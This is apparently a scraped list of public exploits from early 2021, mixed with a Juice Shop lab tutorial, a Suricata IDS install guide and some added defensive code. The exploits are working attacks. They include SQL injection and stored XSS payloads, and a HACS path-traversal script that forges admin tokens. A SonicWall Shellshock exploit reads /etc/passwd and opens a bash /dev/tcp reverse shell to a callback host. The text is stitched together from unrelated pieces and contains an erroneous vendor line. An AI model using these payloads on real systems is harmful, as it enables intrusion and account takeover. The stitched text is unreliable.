#Triggering reverse shell (three times just in case)
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)
  13. # Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection
# Date: 2021-01-28
# Exploit Author: Ruchi Tiwari
# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------
# Vulnerable parameter: uname

# Injected Request

POST /onlinegradingsystem/admin/login.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/onlinegradingsystem/admin/login.php
Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us
Upgrade-Insecure-Requests: 1

uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin=

# Application will load after 20 minutes.
--------------------------------------------------------------------------------------------------------------------
  14. # Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover
# Date: 2021-01-28
# Exploit Author: Lyghtnox
# Vendor Homepage: https://www.home-assistant.io/
# Software Link: https://github.com/hacs/integration
# Version: < 1.10.0
# Tested on: Raspbian + Home Assistant 2021.1.0
# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/

# STEP 1: Run the exploit (python3 exploit.py host port)
# STEP 2: Copy the token printed and set in your browser's local storage with
# the key `hassTokens`

import requests
import jwt
import json
import argparse


class HA:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

    def retrieveFile(self, f):
        # prep.url is overwritten after prepare() so the path is sent exactly as written
        url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}'
        with requests.Session() as s:
            r = requests.Request(method='GET', url=url)
            prep = r.prepare()
            prep.url = url
            try:
                r = s.send(prep, verify=False)
            except requests.exceptions.ConnectionError:
                return
        if r.status_code == 400 or r.status_code == 404:
            return
        return r

    def craftToken(self):
        f = self.retrieveFile('.storage/auth').json()
        # Find owner
        for user in f['data']['users']:
            if user['is_owner']:
                self.owner = user['id']
                break
        else:
            print("No owner found. Using first account")
            self.owner = f['data']['users'][0]['id']
        # Pick the owner's refresh token and sign an access token with its key
        for token in f['data']['refresh_tokens']:
            if self.owner == token['user_id']:
                encoded_jwt = jwt.encode({'iss': token['id']}, token['jwt_key'], algorithm="HS256")
                self.token = {'access_token': encoded_jwt,
                              'token_type': 'Bearer',
                              'refresh_token': token['token'],
                              'expires_in': 1800,
                              'hassUrl': f"http://{self.ip}:{self.port}",
                              'clientId': token['client_id']}
                return self.token


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit a vulnerability in "
                                     "HACS < 1.10.0 to gain admin access to an Home Assistant instance.")
    parser.add_argument("host", type=str, help="IP of the HASS instance")
    parser.add_argument("port", type=int, help="port of the HASS instance")
    args = parser.parse_args()

    r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format(ip=args.host, port=args.port))
    if r.status_code != 404:
        print("HACS found! Testing vulnerability...", end='', flush=True)
        ha = HA(args.host, args.port)
        if ha.retrieveFile('configuration.yaml'):
            print(": VULNERABLE")
            token = ha.craftToken()
            if token:
                print(f"Use the following 'hassTokens': {json.dumps(token)}")
            else:
                print("Unable to craft token")
        else:
            print(": Not vulnerable")
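The traversal above works because the hacsfiles route joins the request path onto its directory without checking where the normalized result ends up. As an added example (not HACS or Home Assistant code; the function names, the temporary directory layout and the sample files are constructed for illustration), this is the containment check a static-file handler needs: percent-decode, join, normalize, then verify the result is still below the root.

```python
from pathlib import Path
from urllib.parse import unquote
import tempfile


def resolve_static(root, requested: str):
    """Return the file below `root` that `requested` refers to, or None.

    The request path is percent-decoded first (so %2e%2e is seen as ..),
    joined onto the root, then fully normalized (dot segments and symlinks
    collapsed). The result is accepted only if it is still inside the root;
    that is exactly the check the traversal above relies on being absent.
    """
    root_path = Path(root).resolve()
    decoded = unquote(requested).lstrip("/")      # a leading slash must not discard root
    candidate = (root_path / decoded).resolve()
    try:
        candidate.relative_to(root_path)
    except ValueError:
        return None                               # escaped the root, e.g. ../../configuration.yaml
    return candidate if candidate.is_file() else None


def demo() -> dict:
    """Constructed layout: <tmp>/hacsfiles/iconset.js plus a secret one level up."""
    base = Path(tempfile.mkdtemp())
    root = base / "hacsfiles"
    root.mkdir()
    (root / "iconset.js").write_text("// constructed sample asset\n")
    (base / "configuration.yaml").write_text("secret: constructed\n")
    return {
        "legit": resolve_static(root, "iconset.js") is not None,
        "dotdot": resolve_static(root, "../configuration.yaml"),
        "encoded": resolve_static(root, "%2e%2e/configuration.yaml"),
        "absolute": resolve_static(root, "/etc/hostname"),
    }


if __name__ == "__main__":
    # Only the legitimate asset resolves; every escape attempt yields None.
    print(demo())
```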
  15. # Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure
# Date: 1/27/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1430
# Version: 1.0
# Tested on: Windows 10
# CVE: CVE-2021-3337

1. Description:
This plugin hides thread content until the user replies to the thread. The information disclosure is that hidden content can be viewed without replying.

2. Proof of Concept:
- Visit a post where content is hidden
- Click the reply or quote button below
Thread content will be displayed in the [quote] bracket without needing to reply
  16. This target range was developed by OWASP and covers the OWASP Top Ten vulnerabilities, with 47 levels in total and varying difficulty. OWASP Juice Shop can also be thought of as a hacking game. This article mainly covers deploying the OWASP Juice Shop environment.

Environment: Kali 2022, Docker

What is Docker
Docker is an open-source application container engine written in Go and released under the Apache 2.0 licence. Docker lets developers package an application and its dependencies into a lightweight, portable container and publish it to any popular Linux machine, or run it virtualized. Containers use a full sandboxing mechanism, so there is no interface between them (similar to iPhone apps). More importantly, the performance overhead of a container is extremely low and it uses relatively few system resources.

Installing Docker
Installing Docker on Kali is very simple; we only need to run the following commands:
apt-get update
apt-get install docker

Installing OWASP Juice Shop with Docker
Run the following command:
docker pull bkimminich/juice-shop
This uses Docker to pull the OWASP image so it can be run directly in Docker, which skips deploying the environment by hand.

Run:
docker run -d -p 3000:3000 bkimminich/juice-shop
Now we only need to open http://<kali-ip>:3000 in the browser.

A first look
As a complete beginner, I was confused when I opened OWASP Juice Shop. What on earth is this? I couldn't make sense of this range at all. By inspecting the page elements we see the following code, in which there is a scoreboard page at the link #score-board. We visit that page, and from here I took the first step toward becoming a big-shot hacker.
  17. # Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /chat/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
Referer: http://localhost/chat/index.php?attempt=
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl
Upgrade-Insecure-Requests: 1

username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--
  18. # Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
# Exploit Author: Darren Martyn
# Vendor Homepage: https://www.home-assistant.io/
# Version: < SMA 8.0.0.4
# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
# a trivial reverse shell using /dev/tcp.
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
# implementing that is left as an exercise for the reader. I've seen a few approaches, and
# would be interested in seeing yours.
# There is another LPE that works only on some models which I also have removed from this.
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time

def banner():
    print """
88 88 "" 88 88 8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88 `8b d8' 88 I8[ "" 88 88 "" `Y8 88 `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88 `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88 "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88 88 88 88 ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba, a8" `Y88 a8" "8a a8" "8a 88P' "Y8 8b 88 8b d8 8b d8 88 "8a, ,d88 "8a, ,a8" "8a, ,a8" 88 `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88
SonicWall SSL-VPN Appliance Remote Exploit
Public Release (Jan 2021).
Author: Darren Martyn.
Credit goes to Phineas Fisher for this.
Stay inside, do crimes.
"""

def handler(lp):
    # handler borrowed from Stephen Seeley.
    print "(+) starting handler on port %d" %(lp)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print "(+) connection from %s" %(addr[0])
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def execute_command(target, command):
    url = target + "/cgi-bin/jarrewrite.sh"
    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
    r = requests.get(url=url, headers=headers, verify=False)
    return r.text

def check_exploitable(target):
    print "(+) Testing %s for pwnability..." %(target)
    output = execute_command(target=target, command="cat /etc/passwd")
    if "root:" in output:
        print "(*) We can continue, time to wreck this shit."
        return True
    else:
        return False

def pop_reverse_shell(target, cb_host, cb_port):
    print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
    backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
    execute_command(target=target, command=backconnect)

def hack_the_planet(target, cb_host, cb_port):
    if check_exploitable(target) == True:
        pass
    else:
        sys.exit("(-) Target not exploitable...")
    handlerthr = Thread(target=handler, args=(int(cb_port),))
    handlerthr.start()
    pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)

def main(args):
    banner()
    if len(args) != 4:
        sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
    hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])

if __name__ == "__main__":
    main(args=sys.argv)
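The request this exploit sends can be recognised at the web tier: a header value that begins with a bash function definition, aimed at a CGI script where headers become environment variables. This added example, not part of the original post, parses constructed raw requests (vpn.example and the sample headers are made up) and reports which headers carry that prefix.

```python
import re
from typing import Dict, Tuple

# A bash function exported through the environment starts with "() {".
# CGI handlers copy request headers into environment variables, which is
# why a header value beginning this way is the Shellshock trigger the
# script above places in User-Agent.
FUNC_DEF = re.compile(r"^\s*\(\)\s*\{")


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into (request-target, {lowercased header: value})."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    target = parts[1] if len(parts) > 1 else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return target, headers


def shellshock_findings(raw: str) -> dict:
    """Report the headers carrying a function definition and whether the request
    was aimed at a CGI script (the only place the header reaches a shell)."""
    target, headers = parse_request(raw)
    flagged = sorted(name for name, value in headers.items() if FUNC_DEF.search(value))
    return {"headers": flagged, "cgi_target": "/cgi-bin/" in target}


# Constructed sample requests, not captured traffic. The second one carries the
# function-definition prefix from the script above with a harmless command.
BENIGN = ("GET /cgi-bin/jarrewrite.sh HTTP/1.1\r\n"
          "Host: vpn.example\r\n"
          "User-Agent: Mozilla/5.0 (constructed)\r\n\r\n")
PROBE = ("GET /cgi-bin/jarrewrite.sh HTTP/1.1\r\n"
         "Host: vpn.example\r\n"
         "User-Agent: () { :; }; echo ; /bin/bash -c 'id'\r\n"
         "Cookie: () { ignored; }; echo\r\n\r\n")


if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("probe", PROBE)):
        print(label, shellshock_findings(req))
```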
  19. # Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Replicates across chat sessions..

POST /chat/send_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 58
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl

msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1
  20. # Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection
# Google Dork: N/A
# Date: 29/1/2021
# Exploit Author: Zeyad Azima
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Version: V1
# Tested on: Windows

# Identify the vulnerability
1- go to http://localhost/animals.php and click on an animal
2- then add the following payload to the url

payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh
url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh

If the web server makes you wait 5 seconds then it's vulnerable

# Exploit
Now you can exploit it using sqlmap command: sqlmap -u url --dbs
example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.10.16#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:05:33 /2021-01-29/

[23:05:34] [INFO] resuming back-end DBMS 'mysql'
[23:05:34] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: anid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: anid=9' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL-- -
---
[23:05:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.10, PHP
back-end DBMS: MySQL >= 5.0.12
[23:05:36] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] umspsdb
[*] zmsdb

[23:05:36] [INFO] fetched data logged to text files under
  21. # Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting
# Date: 1/25/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/
# Version: 1.4
# Tested on: Windows 10

1. Description:
This plugin allows users to delete their account. Giving a reason for deleting your account is vulnerable to XSS.

2. Proof of Concept:
- Go to User CP -> Delete Account
- Input a payload for delete account reason <script>alert('XSS')</script>

Payload will execute here.. admin/index.php?module=user-deleteaccount
  22. 1. System environment configuration
System environment: CentOS 7 x64
IP address: 172.16.91.130

1. Set a static IP address
[root@localhost backlion]# vi /etc/sysconfig/network-scripts/ifcfg-*
BOOTPROTO=static        # dhcp to static (modify)
ONBOOT=yes              # bring the interface up at boot; usually the last line, set it to yes (modify)
IPADDR=172.16.91.130    # static IP (add)
GATEWAY=172.168.91.1    # default gateway; on a virtual machine this is usually .2, i.e. the VMnet8 gateway setting (add)
NETMASK=255.255.255.0   # subnet mask (add)
DNS1=172.16.95.70       # DNS configuration; on a virtual machine the DNS is simply the gateway; add more DNS entries if needed (add)
[root@localhost ~]# /etc/init.d/network restart

Set up DNS:
vim /etc/resolv.conf
nameserver 114.114.114.114
nameserver 8.8.8.8

2. Set the hostname
[root@localhost network-scripts]# vim /etc/hosts   # append the IP-to-hostname binding at the end
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
172.16.91.121 elk-server.com elk   # the last entry is a hostname alias: an intranet name resolved locally, which acts as the intranet's DNS; it is not the same as the public hostname

3. Disable SELinux and the firewall
[root@selks-server ~]# cat /etc/selinux/config
# This file controls the state of SELinux on the system.
# SELINUX= can take one of these three values:
#     enforcing - SELinux security policy is enforced.
#     permissive - SELinux prints warnings instead of enforcing.
#     disabled - No SELinux policy is loaded.
SELINUX=disabled
# SELINUXTYPE= can take one of three values:
#     targeted - Targeted processes are protected,
#     minimum - Modification of targeted policy. Only selected processes are protected.
#     mls - Multi Level Security protection.
SELINUXTYPE=targeted
or
[root@localhost ~]# sed -i '7s/enforcing/disabled/' /etc/selinux/config

Stop the firewall:
[root@selks-server ~]# systemctl stop firewalld.service   # stop the firewall
[root@selks-server ~]#
[root@localhost ~]# systemctl list-unit-files | grep firewalld   # check whether the firewall is started at boot

4. Install wget
[root@selks-server ~]# yum install wget -y

5. Replace the yum source
Switch to the Alibaba Cloud mirror so the system can be updated and software downloaded quickly:
[root@selks-server ~]# yum install wget
[root@selks-server ~]# mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backup
[root@selks-server ~]# wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/centos-7.repo
[root@selks-server ~]# yum clean all
[root@selks-server ~]# yum makecache

6. Update the system
[root@selks-server ~]# yum -y update

7. Install the EPEL source
[root@selks-server rules]# yum -y install epel-release

8. Time synchronisation
[root@localhost yum.repos.d]# yum -y install ntp ntpdate   # install the NTP time-sync packages
[root@localhost yum.repos.d]# cat /etc/ntp.conf   # confirm the configuration file contains the following time sources
server 0.rhel.pool.ntp.org iburst
server 1.rhel.pool.ntp.org iburst
server 2.rhel.pool.ntp.org iburst
server 3.rhel.pool.ntp.org iburst
[root@localhost yum.repos.d]# systemctl enable ntpd   # start ntpd automatically at boot
[root@localhost yum.repos.d]# systemctl start ntpd    # start the ntpd service now
[root@localhost yum.repos.d]# cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
[root@localhost yum.repos.d]# date   # confirm the time matches the current time

9. Add routes
Usage: route add -net|-host dest gw nexthop
route add -net 10.0.0.0/8 gw 192.168.10.1   # add a route
route add default gw 192.168.10.1            # add the default route
To add or delete routes for a NIC permanently, edit /etc/sysconfig/network-scripts/route-<interface_name>:
vim /etc/sysconfig/network-scripts/route-eth0
ADDRESS0=222.16.60.148
NETMASK0=255.255.255.0
GATEWAY0=222.16.60.254
ADDRESS1=222.16.60.214
NETMASK1=255.255.255.0
GATEWAY1=222.16.60.254

2. Install Suricata

1. Install the dependency packages
[root@selks-server ~]# yum install wget libpcap-devel libnet-devel pcre-devel gcc-c++ automake autoconf libtool make libyaml-devel zlib-devel file-devel jansson-devel nss-devel

2. Download the latest Suricata package from http://suricata-ids.org/download/ (as of 14 June 2018 the latest version is 4.0.4)
[root@selks-server ~]#
[root@selks-server ~]# tar zxvf suricata-4.0.4.tar.gz
[root@selks-server ~]# cd suricata-4.0.4

3. Compile and install
[root@selks-server ~]# ./configure
make
make install-full

Note:
By default the available community ruleset snapshot is downloaded from http://rules.emergingthreats/community and stored in the /usr/local/etc/suricata/rules directory.
The path to the Suricata configuration file is /usr/local/etc/suricata/suricata.yaml.

4. Configure Suricata
Note that Suricata can detect HTTP traffic automatically whichever port it uses, so specifying the HTTP_PORTS variable precisely is not very important. The commands are as follows:
[root@selks-server ~]# vim /usr/local/etc/suricata/suricata.yaml
# Suricata's configuration file lives by default at /etc/suricata/suricata.yaml. Before starting, a few important variables must be configured. They fall into two groups: address groups and port groups. A sample configuration follows.
Note: if HOME_NET is set and EXTERNAL_NET is set to !$HOME_NET, an error is reported; when HOME_NET holds the intranet address ranges and EXTERNAL_NET is set to !$HOME_NET, some alerts for traffic between intranet hosts cannot match.

address-groups:                   # configure the address groups
  HOME_NET: "[192.168.0.0/16,10.0.0.0/8,172.16.0.0/12]"   # the networks Suricata inspects
  #HOME_NET: "[192.168.0.0/16]"
  #HOME_NET: "[10.0.0.0/8]"
  #HOME_NET: "[172.16.0.0/12]"
  #HOME_NET: "any"
  #EXTERNAL_NET: "!$HOME_NET"
  EXTERNAL_NET: "any"             # the other network addresses outside the local area
  HTTP_SERVERS: "$HOME_NET"
  SMTP_SERVERS: "$HOME_NET"
  SQL_SERVERS: "$HOME_NET"
  DNS_SERVERS: "$HOME_NET"
  TELNET_SERVERS: "$HOME_NET"
  AIM_SERVERS: "$EXTERNAL_NET"
  DNP3_SERVER: "$HOME_NET"
  DNP3_CLIENT: "$HOME_NET"
  MODBUS_CLIENT: "$HOME_NET"
  MODBUS_SERVER: "$HOME_NET"
  ENIP_CLIENT: "$HOME_NET"
  ENIP_SERVER: "$HOME_NET"
port-groups:
  HTTP_PORTS: "80"                # identify the port numbers used by the different services
  SHELLCODE_PORTS: "!80"
  ORACLE_PORTS: 1521
  SSH_PORTS: 22
  DNP3_PORTS: 20000
  MODBUS_PORTS: 502
  FILE_DATA_PORTS: "[$HTTP_PORTS,110,143]"
  FTP_PORTS: 21

##
## Step 2: select the rules to enable or disable
##
default-rule-path: /usr/local/etc/suricata/rules   # set the default rule library path
rule-files:
  - botcc.rules
  # - botcc.portgrouped.rules
  - ciarmy.rules
  - compromised.rules
  - drop.rules
  - dshield.rules
  # - emerging-activex.rules
  - emerging-attack_response.rules
  - emerging-chat.rules
  - emerging-current_events.rules
  - emerging-dns.rules
  - emerging-dos.rules
  - emerging-exploit.rules
  - emerging-ftp.rules
  # - emerging-games.rules
  # - emerging-icmp_info.rules
  # - emerging-icmp.rules
  - emerging-imap.rules
  # - emerging-inappropriate.rules
  # - emerging-info.rules
  - emerging-malware.rules
  - emerging-misc.rules
  - emerging-mobile_malware.rules
  - emerging-netbios.rules
  - emerging-p2p.rules
  - emerging-policy.rules
  - emerging-pop3.rules
  - emerging-rpc.rules
  # - emerging-scada.rules
  # - emerging-scada_special.rules
  - emerging-scan.rules
  # - emerging-shellcode.rules
  - emerging-smtp.rules
  - emerging-snmp.rules
  - emerging-sql.rules
  - emerging-telnet.rules
  - emerging-tftp.rules
  - emerging-trojan.rules
  - emerging-user_agents.rules
  - emerging-voip.rules
  - emerging-web_client.rules
  - emerging-web_server.rules
  # - emerging-web_specific_apps.rules
  - emerging-worm.rules
  - tor.rules
  # - decoder-events.rules    # available in the suricata sources under the rules dir
  # - stream-events.rules     # available in the suricata sources under the rules dir
  - http-events.rules         # available in the suricata sources under the rules dir
  - smtp-events.rules         # available in the suricata sources under the rules dir
  - dns-events.rules          # available in the suricata sources under the rules dir
  - tls-events.rules          # available in the suricata sources under the rules dir
  # - modbus-events.rules     # available in the suricata sources under the rules dir
  # - app-layer-events.rules  # available in the suricata sources under the rules dir
  # - dnp3-events.rules       # available in the suricata sources under the rules dir
  # - ntp-events.rules        # available in the suricata sources under the rules dir

classification-file: /usr/local/etc/suricata/classification.config
reference-config-file: /usr/local/etc/suricata/reference.config
threshold-file: /usr/local/etc/suricata/threshold.config

##
## Step 3: select the outputs to enable
##
types:
  - alert:
      # payload: yes               # enable dumping of the payload in Base64
      payload-buffer-size: 6kb     # max size of the payload buffer to output in eve-log
      payload-printable: yes       # enable dumping of the payload in printable (lossy) format; records the original payload
      # packet: yes                # enable dumping of the packet (without stream segments)
      # http-body: yes             # enable dumping of the HTTP body in Base64
      http-body-printable: yes     # enable dumping of the HTTP body in printable format; records the original HTTP body
      metadata: yes                # add L7/applayer fields, flowbits and other vars to the alert

# Pattern-matcher buffers: scan as many packets in parallel as possible.
max-pending-packets: 1024   # the number of packets Suricata can process at the same time; the maximum depends on the amount of memory. With more memory a larger value can be set and performance may improve. The default is 1024.

Some well-known evasion techniques exploit the behaviour of the operating system's own network stack (for example TCP reassembly). As a countermeasure, modern IDSes offer "target-based" detection, tuning the detection engine's algorithms to the target operating system. So if you know which operating system a host runs, giving that information to Suricata can greatly improve the detection rate. This is what host-os-policy exists for. In this example the default IDS policy is the Linux system. If no operating-system information is specified for an IP address, Suricata applies the Linux-based detection policy by default. When communication to 192.168.122.0/28 and 192.168.122.155 is captured, Suricata applies the Windows-based detection policy, as follows:

host-os-policy:
  # Make the default policy windows.
  windows: [10.22.0.0/24]
  bsd: []
  bsd-right: []
  old-linux: []
  linux: [0.0.0.0/0, 10.22.0.188]
  old-solaris: []
  solaris: []
  hpux10: []
  hpux11: []
  irix: []
  macos: []
  vista: []
  windows2k3: []

5. Turn off the NIC's LRO/GRO features (change the interface name to match the actual one)
[root@selks-server ~]# ethtool -K ens32 gro off lro off
Cannot change large-receive-offload   # means the NIC does not support the LRO/GRO features

6. List all available run modes
[root@selks-server ~]# /usr/local/bin/suricata --list-runmodes
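The note on HOME_NET and EXTERNAL_NET above states that with EXTERNAL_NET set to !$HOME_NET, alerts for traffic between intranet hosts cannot match. This added example is a simplified model of Suricata's address-group matching, not Suricata code; the HOME_NET ranges mirror the sample configuration, the flows are constructed, and the rule shape assumed is the usual $HOME_NET any -> $EXTERNAL_NET any (or its reverse).

```python
import ipaddress
from typing import Iterable, List, Tuple

# Address ranges from the sample configuration above.
HOME_NET = ["192.168.0.0/16", "10.0.0.0/8", "172.16.0.0/12"]

# A group is a list of (negated, network) terms.
Group = List[Tuple[bool, ipaddress.IPv4Network]]


def build_vars(external_net: str) -> dict:
    """Return HOME_NET/EXTERNAL_NET as term lists for one of the two settings
    contrasted in the note: "any" or "!$HOME_NET"."""
    home: Group = [(False, ipaddress.ip_network(n)) for n in HOME_NET]
    if external_net == "any":
        ext: Group = [(False, ipaddress.ip_network("0.0.0.0/0"))]
    elif external_net == "!$HOME_NET":
        ext = [(True, net) for _, net in home]
    else:
        raise ValueError("this model only covers 'any' and '!$HOME_NET'")
    return {"HOME_NET": home, "EXTERNAL_NET": ext}


def in_group(addr: str, group: Group) -> bool:
    """Simplified semantics: an address is excluded by any negated term it falls
    in; otherwise it must fall in some positive term, and a group made only of
    negations matches everything the negations do not exclude."""
    ip = ipaddress.ip_address(addr)
    positives = [net for neg, net in group if not neg]
    negatives = [net for neg, net in group if neg]
    if any(ip in net for net in negatives):
        return False
    return True if not positives else any(ip in net for net in positives)


def rule_matches(vars_: dict, src: str, dst: str) -> bool:
    """Would a rule on $HOME_NET -> $EXTERNAL_NET (or the reverse) see this flow?"""
    home, ext = vars_["HOME_NET"], vars_["EXTERNAL_NET"]
    return (in_group(src, home) and in_group(dst, ext)) or \
           (in_group(src, ext) and in_group(dst, home))


def compare(flows: Iterable[Tuple[str, str]]) -> dict:
    """Evaluate each flow under both EXTERNAL_NET settings."""
    any_vars = build_vars("any")
    neg_vars = build_vars("!$HOME_NET")
    return {f"{s}->{d}": {"any": rule_matches(any_vars, s, d),
                          "!$HOME_NET": rule_matches(neg_vars, s, d)}
            for s, d in flows}


# Constructed flows: intranet->intranet, intranet->internet, internet->intranet.
FLOWS = [("10.0.0.5", "192.168.1.10"),
         ("10.0.0.5", "203.0.113.9"),
         ("203.0.113.9", "172.16.4.4")]


if __name__ == "__main__":
    # Only the intranet->intranet flow differs: visible with "any", invisible with "!$HOME_NET".
    for flow, result in compare(FLOWS).items():
        print(flow, result)
```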
  23. # Exploit Title: User Management System 1.0 - 'uid' SQL Injection
# Google Dork: N/A
# Date: 29/1/2021
